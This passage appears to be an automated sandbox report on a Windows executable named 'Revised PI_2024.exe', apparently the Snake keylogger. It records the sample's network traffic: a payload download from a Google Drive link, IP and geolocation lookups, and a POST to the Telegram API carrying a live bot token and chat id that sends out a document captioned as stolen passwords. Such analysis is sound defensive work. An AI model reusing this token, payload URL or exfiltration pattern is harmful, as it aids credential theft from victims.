            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B02E7h131_2_360B0040
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360BA6FFh131_2_360BA458
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B1CF7h131_2_360B1A50
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B3707h131_2_360B3460
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B911Fh131_2_360B8E78
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B073Fh131_2_360B0498
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B7B3Fh131_2_360B7898
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]131_2_360B5AAB
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B214Fh131_2_360B1EA8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]131_2_360B5AB8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360BAB57h131_2_360BA8B0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B9577h131_2_360B92D0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B0B97h131_2_360B08F0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B25A7h131_2_360B2300
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B7FBFh131_2_360B7D18
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B0FEFh131_2_360B0D48
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B29FFh131_2_360B2758
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B8417h131_2_360B8170
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B9E4Fh131_2_360B9BA8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B1447h131_2_360B11A0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B2E57h131_2_360B2BB0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B886Fh131_2_360B85C8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]131_2_360B5DCE
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 4x nop then jmp 360B189Fh131_2_360B15F8

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: POST /bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendDocument?chat_id=6419839739&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcaae449bca96bHost: api.telegram.orgContent-Length: 550Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sq HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sq&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49833 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 192.168.11.20:49839 -> 104.21.67.152:443 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sq HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sq&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendDocument?chat_id=6419839739&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcaae449bca96bHost: api.telegram.orgContent-Length: 550Connection: Keep-Alive
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.000000003409F000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033FE0000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033FD4000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034024000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034072000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034089000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034094000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.000000003407D000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.00000000340AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Revised PI_2024.exe, 00000083.00000003.82253848738.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: Revised PI_2024.exe, 00000083.00000003.82253848738.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: Revised PI_2024.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Revised PI_2024.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033FFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Revised PI_2024.exe, 00000083.00000003.82253848738.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendDocument?chat_id=6419
            Source: Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Revised PI_2024.exe, 00000083.00000002.86881921308.00000000036C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Revised PI_2024.exe, 00000083.00000002.86882545175.0000000005260000.00000004.00001000.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.00000000036C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sq
            Source: Revised PI_2024.exe, 00000083.00000002.86881921308.00000000036C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sqmW
            Source: Revised PI_2024.exe, 00000083.00000002.86881921308.00000000036C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/w
            Source: Revised PI_2024.exe, 00000083.00000003.82253848738.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.000000000374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Revised PI_2024.exe, 00000083.00000002.86881921308.00000000036C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sq&export=download
            Source: Revised PI_2024.exe, 00000083.00000003.82253848738.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.000000000374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/i
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.000000003410B000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.00000000340B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034116000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.000000003410B000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86894116757.0000000034FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034116000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.000000003410B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: Revised PI_2024.exe, 00000083.00000002.86894116757.0000000034FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/0
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.000000003410B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/lB
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034116000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.000000003410B000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86894116757.0000000034FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: Revised PI_2024.exe, 00000083.00000003.82253848738.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.000000003409F000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033FE0000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034024000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034072000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034089000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034094000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.000000003407D000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.00000000340AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000340AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.104
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.000000003409F000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034024000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034072000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034089000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034094000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.000000003407D000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.00000000340AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.104$
            Source: Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownHTTPS traffic detected: 172.253.63.113:443 -> 192.168.11.20:49830 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.253.115.132:443 -> 192.168.11.20:49831 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49841 version: TLS 1.2
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_00404FCD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FCD
            Source: Conhost.exeProcess created: 86
